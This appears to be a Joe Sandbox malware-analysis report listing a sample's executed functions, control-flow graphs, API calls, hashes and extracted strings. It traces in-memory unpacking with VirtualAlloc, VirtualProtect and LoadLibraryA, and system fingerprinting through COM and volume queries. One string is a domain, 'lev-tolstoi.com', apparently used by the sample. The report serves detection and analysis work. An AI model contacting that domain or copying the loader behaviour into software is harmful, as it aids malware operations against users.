GetVolumeInformationW 26021->26023 26030 43822c 26023->26030 26025 4381f1 SysFreeString 26024->26025 26026 437e7e CoSetProxyBlanket 26024->26026 26025->26021 26027 4381e7 26026->26027 26028 437e9e SysAllocString 26026->26028 26027->26025 26031 437f70 26028->26031 26030->26014 26031->26031 26032 437fbb SysAllocString 26031->26032 26034 437fe2 26032->26034 26033 4381d2 SysFreeString SysFreeString 26033->26027 26034->26033 26035 4381c8 26034->26035 26036 43802d VariantInit 26034->26036 26035->26033 26038 438080 26036->26038 26037 4381b7 VariantClear 26037->26035 26038->26037 26039 43ccbd 26040 43cce0 26039->26040 26043 43c330 LdrInitializeThunk 26040->26043 26042 43cd58 26043->26042 26044 409d3e 26047 43dd00 26044->26047 26048 409d4e WSAStartup 26047->26048

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00437BC0 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 639memorycomCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 437bc0-437bea 1 437bf0-437c27 0->1 1->1 2 437c29-437c3f 1->2 3 437c40-437c76 2->3 3->3 4 437c78-437cb6 3->4 5 437cc0-437d1f 4->5 5->5 6 437d21-437d40 5->6 8 437d42 6->8 9 437d4d-437d58 6->9 8->9 10 437d60-437d8e 9->10 10->10 11 437d90-437ded CoCreateInstance 10->11 12 437df3-437e24 11->12 13 438205-43822a call 43dd00 GetVolumeInformationW 11->13 14 437e30-437e44 12->14 18 438234-438236 13->18 19 43822c-438230 13->19 14->14 16 437e46-437e78 SysAllocString 14->16 22 4381f1-438201 SysFreeString 16->22 23 437e7e-437e98 CoSetProxyBlanket 16->23 21 43824d-438258 18->21 19->18 24 438264-43827f 21->24 25 43825a-438261 21->25 22->13 26 4381e7-4381ed 23->26 27 437e9e-437eb3 23->27 28 438280-4382cf 24->28 25->24 26->22 30 437ec0-437ee5 27->30 28->28 29 4382d1-438302 28->29 31 438310-438334 29->31 30->30 32 437ee7-437f63 SysAllocString 30->32 31->31 33 438336-438364 call 41e560 31->33 34 437f70-437fb9 32->34 38 438370-438378 33->38 34->34 36 437fbb-437feb SysAllocString 34->36 41 4381d2-4381e4 SysFreeString * 2 36->41 42 437ff1-438013 36->42 38->38 40 43837a-43837c 38->40 43 438382-438392 call 407f20 40->43 44 438240-438247 40->44 41->26 48 438019-43801c 42->48 49 4381c8-4381ce 42->49 43->44 44->21 46 438397-43839e 44->46 48->49 51 438022-438027 48->51 49->41 51->49 52 43802d-43807f VariantInit 51->52 53 438080-4380b2 52->53 53->53 54 4380b4-4380c6 53->54 55 4380ca-4380d3 54->55 56 4381b7-4381c4 VariantClear 55->56 57 4380d9-4380df 55->57 56->49 57->56 58 4380e5-4380f3 57->58 59 4380f5-4380fa 58->59 60 43812d 58->60 62 43810c-438110 59->62 61 43812f-43816d call 407ea0 call 408cf0 60->61 73 4381a6-4381b3 call 407eb0 61->73 74 43816f-438185 61->74 64 438112-43811b 62->64 65 438100 62->65 68 438122-438126 64->68 69 43811d-438120 64->69 67 438101-43810a 65->67 67->61 67->62 68->67 70 438128-43812b 68->70 69->67 70->67 73->56 74->73 75 438187-43819d 74->75 75->73 77 43819f-4381a2 75->77 77->73
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437DE2
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00437E47
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E90
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 00437EE8
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(F9BDF745), ref: 00437FC0
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 00438032
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004381B8
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004381DC
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004381E2
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                          • String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
                                                                                                                                                                                                                                                          • API String ID: 3490847348-109390196
                                                                                                                                                                                                                                                          • Opcode ID: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                                                                                                                                                                                          • Instruction ID: 8131ac09c1f2c8c7a662361a942698708379fad2ab2868bed6bea96b7e7f230e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2312DEB2A083519BD720CF68C88475BFBE1EBC9714F194A2DF9D497390D778D8058B86
                                                                                                                                                                                                                                                          Function 0040AD40 Relevance: 12.9, Strings: 10, Instructions: 410COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 88 40ad40-40adc8 89 40add0-40add9 88->89 89->89 90 40addb-40adee 89->90 92 40b114-40b11e 90->92 93 40adf5-40adf7 90->93 94 40b065-40b069 90->94 95 40b145-40b14e 90->95 96 40b155-40b15c 90->96 97 40adfc-40b01f 90->97 98 40b06e-40b10d call 407e70 90->98 99 40b15e-40b16a 90->99 125 40b3a0-40b3a2 92->125 126 40b125-40b13a call 43dd00 92->126 127 40b3aa-40b3ac 92->127 128 40b13c-40b140 92->128 129 40b3af-40b3b6 93->129 123 40b39a-40b39d 94->123 95->96 95->99 101 40b200 95->101 102 40b343-40b348 95->102 103 40b2a5-40b2ba 95->103 104 40b285-40b29a call 43dd00 95->104 105 40b206-40b210 95->105 106 40b22e-40b232 95->106 107 40b370-40b378 95->107 108 40b2d0-40b2d1 95->108 109 40b350 95->109 110 40b352-40b357 95->110 111 40b237-40b257 95->111 112 40b277-40b27e 95->112 113 40b217-40b22c call 43dd00 95->113 114 40b319-40b33c 95->114 115 40b29c-40b2a0 95->115 116 40b37d-40b380 95->116 117 40b2fd-40b303 call 43c2d0 95->117 118 40b25e-40b270 95->118 119 40b2de-40b2f6 95->119 120 40b35e-40b367 95->120 121 40b19d-40b1b6 96->121 100 40b020-40b047 97->100 98->92 98->95 98->96 98->99 98->101 98->102 98->103 98->104 98->105 98->106 98->107 98->108 98->109 98->110 98->111 98->112 98->113 98->114 98->115 98->116 98->117 98->118 98->119 98->120 122 40b170-40b195 99->122 100->100 137 40b049-40b054 100->137 102->109 103->108 104->115 105->106 105->113 134 40b387 106->134 107->108 140 40b2d8 108->140 110->101 110->104 110->105 110->106 110->113 110->115 110->116 110->120 111->101 111->102 111->103 111->104 111->105 111->106 111->107 111->108 111->109 111->110 111->112 111->113 111->114 111->115 111->116 111->117 111->118 111->119 111->120 112->101 112->104 112->105 112->106 112->113 112->115 113->106 114->101 114->102 114->104 114->105 114->106 114->113 114->115 114->116 114->120 115->116 116->134 142 40b308-40b312 117->142 118->101 118->102 118->103 118->104 118->105 118->106 118->107 118->108 118->109 118->110 118->112 118->113 118->114 118->115 118->116 118->117 118->119 118->120 119->101 119->102 119->104 119->105 119->106 119->109 119->110 119->113 119->114 119->115 119->116 119->117 119->120 120->107 132 40b1c0-40b1db 121->132 122->122 131 40b197-40b19a 122->131 123->125 125->127 126->128 127->129 130 40b390-40b393 128->130 130->123 131->121 132->132 141 40b1dd-40b1f7 132->141 134->130 150 40b057-40b05e 137->150 140->119 141->101 141->102 141->103 141->104 141->105 141->106 141->107 141->108 141->109 141->110 141->111 141->112 141->113 141->114 141->115 141->116 141->117 141->118 141->119 141->120 142->101 142->102 142->104 142->105 142->106 142->109 142->110 142->113 142->114 142->115 142->116 142->120 150->92 150->94 150->95 150->96 150->98 150->99 150->101 150->102 150->103 150->104 150->105 150->106 150->107 150->108 150->109 150->110 150->111 150->112 150->113 150->114 150->115 150->116 150->117 150->118 150->119 150->120
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: &x&z$.|#~$/pQr$<|8~$a()*$d<h>$l0f2$m4f6$ws$|x
                                                                                                                                                                                                                                                          • API String ID: 0-1443210402
                                                                                                                                                                                                                                                          • Opcode ID: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                                                                                                                                                                                          • Instruction ID: 5a455e5b33dc051389bcb969b85f11440245edd1c99918e46ba8560acc0916f5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bef42f24a5999112fcff0273500699b06b7358e8a10142eb4ee24f81603f5a99
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F176B5600B02DFD3348F25D895797BBE1FB46315F118A2CD5AA8BBA0C775A805CF88
                                                                                                                                                                                                                                                          Function 004085D0 Relevance: 7.7, APIs: 5, Instructions: 170threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 240 4085d0-4085e1 call 43bc50 243 4087e3-4087e5 ExitProcess 240->243 244 4085e7-4085ee call 434a50 240->244 247 4085f4-40861f GetCurrentProcessId GetCurrentThreadId 244->247 248 4087de call 43c2b0 244->248 249 408621-408623 247->249 250 408625-408730 SHGetSpecialFolderPathW GetForegroundWindow 247->250 248->243 249->250 252 408736-4087b8 250->252 253 4087ba-4087d2 call 409aa0 250->253 252->253 253->248 256 4087d4 call 40c5c0 253->256 258 4087d9 call 40b3c0 256->258 258->248
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004085F4
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004085FE
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408713
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408728
                                                                                                                                                                                                                                                            • Part of subcall function 0040C5C0: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C5D3
                                                                                                                                                                                                                                                            • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32(004087DE), ref: 0040B3C6
                                                                                                                                                                                                                                                            • Part of subcall function 0040B3C0: FreeLibrary.KERNEL32 ref: 0040B3E7
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004087E5
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3072701918-0
                                                                                                                                                                                                                                                          • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction ID: e578a3b207df15b92ed52ca48c6c45aa0500652032070dd10f4452ae5aeaaed9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39512877F547184BC318AEB98D8636AF6C65BC4210F0E813EA985E73D1EDB89C4542C8
                                                                                                                                                                                                                                                          Function 0040A8C0 Relevance: 6.6, Strings: 5, Instructions: 384COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 260 40a8c0-40a8ef 261 40a8f0-40a909 260->261 261->261 262 40a90b-40aa02 261->262 263 40aa10-40aa2e 262->263 263->263 264 40aa30-40aa51 263->264 265 40aa60-40aa9b 264->265 265->265 266 40aa9d-40aab4 call 40b3f0 265->266 268 40aab9-40aac0 266->268 269 40aac6-40aad4 268->269 270 40ad2a-40ad36 268->270 271 40aae0-40aafa 269->271 271->271 272 40aafc-40ab02 271->272 273 40ab10-40ab1a 272->273 274 40ab21-40ab25 273->274 275 40ab1c-40ab1f 273->275 276 40ad21-40ad27 call 43a940 274->276 277 40ab2b-40ab3f 274->277 275->273 275->274 276->270 279 40ab40-40ab52 277->279 279->279 281 40ab54-40ab60 279->281 282 40ab62-40ab6d 281->282 283 40ab94-40ab98 281->283 284 40ab77-40ab7b 282->284 285 40ad1c-40ad1e 283->285 286 40ab9e-40abc9 283->286 284->285 287 40ab81-40ab88 284->287 285->276 288 40abd0-40abf4 286->288 289 40ab8a-40ab8c 287->289 290 40ab8e 287->290 288->288 291 40abf6-40abfd 288->291 289->290 292 40ab70-40ab75 290->292 293 40ab90-40ab92 290->293 294 40ac34-40ac36 291->294 295 40abff-40ac0a 291->295 292->283 292->284 293->292 294->285 296 40ac3c-40ac52 294->296 297 40ac17-40ac1b 295->297 298 40ac60-40acad 296->298 297->285 299 40ac21-40ac28 297->299 298->298 300 40acaf-40acb9 298->300 301 40ac2a-40ac2c 299->301 302 40ac2e 299->302 305 40acf3-40acf5 300->305 306 40acbb-40acc3 300->306 301->302 303 40ac10-40ac15 302->303 304 40ac30-40ac32 302->304 303->294 303->297 304->303 308 40acfb-40ad1a call 40a630 305->308 307 40acd7-40acdc 306->307 307->285 309 40acde-40ace5 307->309 308->276 312 40ace7-40ace9 309->312 313 40aceb 309->313 312->313 314 40acd0-40acd5 313->314 315 40aced-40acf1 313->315 314->307 316 40acf7-40acf9 314->316 315->314 316->285 316->308
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: $>$$>$/ $@G$xA
                                                                                                                                                                                                                                                          • API String ID: 0-3945432221
                                                                                                                                                                                                                                                          • Opcode ID: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                                                                                                                                                                                          • Instruction ID: 55ac8b7e195ada22395993ae97bb18e0f83c644d7aeb54a7be5ab8cf0bb5c33f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f9dd7b07d0464a3871681ac543f7f30e7f289b115bd5a1a199045cae91454cc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFB1167520C3508BD324CF1884906AFBBE2EFC2704F18497DE9D12B381D679995AD78B
                                                                                                                                                                                                                                                          Function 0040C63C Relevance: 4.4, Strings: 3, Instructions: 602COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 317 40c63c-40c64b 318 40c650-40c6ab 317->318 318->318 319 40c6ad-40c6e2 call 408540 call 437bc0 318->319 324 40c6f0-40c715 319->324 324->324 325 40c717-40c77a 324->325 326 40c780-40c7b7 325->326 326->326 327 40c7b9-40c7ca 326->327 328 40c7eb-40c7f3 327->328 329 40c7cc-40c7d3 327->329 331 40c7f5-40c7f6 328->331 332 40c80b-40c818 328->332 330 40c7e0-40c7e9 329->330 330->328 330->330 333 40c800-40c809 331->333 334 40c81a-40c821 332->334 335 40c83b-40c843 332->335 333->332 333->333 336 40c830-40c839 334->336 337 40c845-40c846 335->337 338 40c85b-40c976 335->338 336->335 336->336 339 40c850-40c859 337->339 340 40c980-40c9a7 338->340 339->338 339->339 340->340 341 40c9a9-40c9d3 340->341 342 40c9e0-40ca22 341->342 342->342 343 40ca24-40ca76 call 40b3f0 342->343 346 40ca80-40cadb 343->346 346->346 347 40cadd-40cb11 call 408540 call 437bc0 346->347 352 40cb20-40cb46 347->352 352->352 353 40cb48-40cbab 352->353 354 40cbb0-40cbe8 353->354 354->354 355 40cbea-40cbfb 354->355 356 40cc0b-40cc13 355->356 357 40cbfd-40cbff 355->357 358 40cc15-40cc16 356->358 359 40cc2b-40cc38 356->359 360 40cc00-40cc09 357->360 361 40cc20-40cc29 358->361 362 40cc3a-40cc41 359->362 363 40cc5b-40cc63 359->363 360->356 360->360 361->359 361->361 364 40cc50-40cc59 362->364 365 40cc65-40cc66 363->365 366 40cc7b-40cda7 363->366 364->363 364->364 367 40cc70-40cc79 365->367 368 40cdb0-40cdd7 366->368 367->366 367->367 368->368 369 40cdd9-40ce09 368->369 370 40ce10-40ce52 369->370 370->370 371 40ce54-40ce80 call 40b3f0 370->371 373 40ce85-40ce9b 371->373
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 57DB89578F850E8625E054D164A37606$^_$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 0-3000147402
                                                                                                                                                                                                                                                          • Opcode ID: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                                                                                                                                                                                          • Instruction ID: dd9baf14083705404bbb6167aa7354d43b480db8533e0b19abc2341ccbf856c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1756b59fe5bbb69c448a25ce81c9b929e652f332c93af6c72070d1cd974e5a62
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1020DB158E3928AD334CF2594907EBBBE1EBD6304F088A6DC4D91B342D7390909DBD6
                                                                                                                                                                                                                                                          Function 009A9C5E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 393 9a9c5e-9a9c77 394 9a9c79-9a9c7b 393->394 395 9a9c7d 394->395 396 9a9c82-9a9c8e CreateToolhelp32Snapshot 394->396 395->396 397 9a9c9e-9a9cab Module32First 396->397 398 9a9c90-9a9c96 396->398 399 9a9cad-9a9cae call 9a991d 397->399 400 9a9cb4-9a9cbc 397->400 398->397 405 9a9c98-9a9c9c 398->405 403 9a9cb3 399->403 403->400 405->394 405->397
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 009A9C86
                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 009A9CA6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665368901.00000000009A9000.00000040.00000020.00020000.00000000.sdmp, Offset: 009A9000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9a9000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                          • Instruction ID: 91bc98e2d3219ada9fe5031f72cd6874e6e315c49ff7f55f1fa8ba9f0459bb27
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF06235100B116BD7202BB9998DB6E76FCBF5A735F100528E68A920C0DA70EC458AA1
                                                                                                                                                                                                                                                          Function 0043C330 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                          Function 0043E840 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                          • Opcode ID: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
                                                                                                                                                                                                                                                          • Instruction ID: 4d7dcfee1db6f6d48993414e542c2c95e5bcdc0dd52ea84200f971aeb3cabb85
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 751462d93d042a55990990ac1d4287ed324398e9759de5a96dbc9d6a6aa29821
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A04137766153005FE314EB26DC80B67B3A6FFC9314F1A982DE584973A0E635EC11978A
                                                                                                                                                                                                                                                          Function 0043CA12 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
                                                                                                                                                                                                                                                          • Instruction ID: 9bab5eeda3f2c328a6bc7135d099a7f1260cbe33dc8c8fee6861cc27dc7a273f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b581ea95b5affbbd2d441ab3bf991b3166ab57e396bc3bff6f6687d26169d528
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21E935B441198BDB04DB14C8C1ABFB332BB9E714F28B129C85237352D3399D129B98
                                                                                                                                                                                                                                                          Function 0247003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 156 247003c-2470047 157 247004c-2470263 call 2470a3f call 2470e0f call 2470d90 VirtualAlloc 156->157 158 2470049 156->158 173 2470265-2470289 call 2470a69 157->173 174 247028b-2470292 157->174 158->157 178 24702ce-24703c2 VirtualProtect call 2470cce call 2470ce7 173->178 175 24702a1-24702b0 174->175 177 24702b2-24702cc 175->177 175->178 177->175 185 24703d1-24703e0 178->185 186 24703e2-2470437 call 2470ce7 185->186 187 2470439-24704b8 VirtualFree 185->187 186->185 189 24705f4-24705fe 187->189 190 24704be-24704cd 187->190 192 2470604-247060d 189->192 193 247077f-2470789 189->193 191 24704d3-24704dd 190->191 191->189 197 24704e3-2470505 LoadLibraryA 191->197 192->193 198 2470613-2470637 192->198 195 24707a6-24707b0 193->195 196 247078b-24707a3 193->196 200 24707b6-24707cb 195->200 201 247086e-24708be LoadLibraryA 195->201 196->195 202 2470517-2470520 197->202 203 2470507-2470515 197->203 204 247063e-2470648 198->204 205 24707d2-24707d5 200->205 208 24708c7-24708f9 201->208 206 2470526-2470547 202->206 203->206 204->193 207 247064e-247065a 204->207 209 24707d7-24707e0 205->209 210 2470824-2470833 205->210 211 247054d-2470550 206->211 207->193 212 2470660-247066a 207->212 213 2470902-247091d 208->213 214 24708fb-2470901 208->214 215 24707e4-2470822 209->215 216 24707e2 209->216 220 2470839-247083c 210->220 217 2470556-247056b 211->217 218 24705e0-24705ef 211->218 219 247067a-2470689 212->219 214->213 215->205 216->210 221 247056f-247057a 217->221 222 247056d 217->222 218->191 223 2470750-247077a 219->223 224 247068f-24706b2 219->224 220->201 225 247083e-2470847 220->225 227 247057c-2470599 221->227 228 247059b-24705bb 221->228 222->218 223->204 229 24706b4-24706ed 224->229 230 24706ef-24706fc 224->230 231 247084b-247086c 225->231 232 2470849 225->232 239 24705bd-24705db 227->239 228->239 229->230 233 24706fe-2470748 230->233 234 247074b 230->234 231->220 232->201 233->234 234->219 239->211
                                                                                                                                                                                                                                                          APIs
